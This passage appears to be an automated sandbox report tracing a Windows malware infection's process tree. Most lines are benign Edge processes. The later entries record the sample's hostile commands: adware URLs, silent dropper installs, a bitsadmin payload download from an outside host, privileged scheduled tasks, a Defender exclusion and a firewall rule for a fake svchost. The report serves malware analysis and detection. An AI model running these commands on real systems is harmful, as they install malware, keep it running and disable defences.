C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5056 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5252 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:813⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3312 /prefetch:2
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1272 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1108 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:8
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6456 /prefetch:8
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4396 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5816 /prefetch:8
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6272 /prefetch:8
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6860 /prefetch:8
-
[depth 12] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718
-
[depth 12] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718
-
[depth 12] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x12c,0x130,0x134,0xfc,0x138,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718
-
[depth 12] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718
-
[depth 12] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718
-
[depth 12] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718
-
[depth 12] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718
-
[depth 12] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=3
-
[depth 13] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f4718
-
[depth 11] C:\Users\Admin\AppData\Local\Temp\61-d9166-54d-8d1b0-2cb03a4e2ea98\Lylalyfomo.exe | "C:\Users\Admin\AppData\Local\Temp\61-d9166-54d-8d1b0-2cb03a4e2ea98\Lylalyfomo.exe"
-
[depth 12] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
- Suspicious use of NtCreateProcessExOtherParentProcess
-
[depth 13] C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe | C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SID=778 CID=778 SILENT=1 /quiet
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
[depth 14] C:\Windows\SysWOW64\msiexec.exe | "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\of1ny4kc.oap\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634304480 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
-
[depth 12] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exe /eufive & exit
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 13] C:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exe | C:\Users\Admin\AppData\Local\Temp\gv4dz2d1.pzr\GcleanerEU.exe /eufive
-
[depth 14] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 276
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 12] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exe /qn CAMPAIGN="654" & exit
-
[depth 13] C:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exe | C:\Users\Admin\AppData\Local\Temp\czjmqodi.mfq\installer.exe /qn CAMPAIGN="654"
-
[depth 12] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exe & exit
-
[depth 13] C:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exe | C:\Users\Admin\AppData\Local\Temp\sgvdiyla.kt0\any.exe
-
[depth 12] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exe /mixfive & exit
-
[depth 13] C:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exe | C:\Users\Admin\AppData\Local\Temp\kwfxqtpx.5hz\gcleaner.exe /mixfive
- Suspicious use of NtCreateProcessExOtherParentProcess
-
[depth 14] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 276
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 12] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exe /S & exit
-
[depth 13] C:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exe | C:\Users\Admin\AppData\Local\Temp\ag0xzau2.hle\autosubplayer.exe /S
- Drops file in Program Files directory
-
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"
- Blocklisted process makes network request
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
[depth 15] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"
-
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"
-
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"
-
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"
- Suspicious use of SetWindowsHookEx
-
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"
-
[depth 14] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxCCEF.tmp\tempfile.ps1"
- Checks for any installed AV software in registry
-
[depth 14] C:\Windows\SysWOW64\bitsadmin.exe | "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
- Download via BitsAdmin
-
[depth 12] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exe /qn CAMPAIGN=654 & exit
-
[depth 13] C:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exe | C:\Users\Admin\AppData\Local\Temp\vldtrs0o.oux\installer.exe /qn CAMPAIGN=654
-
[depth 7] C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
- Creates scheduled task(s)
-
[depth 8] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
[depth 7] C:\Windows\SysWOW64\schtasks.exe | schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
- Creates scheduled task(s)
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe | "C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 7] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 276
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe | "C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
-
[depth 7] C:\Windows\System32\netsh.exe | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
-
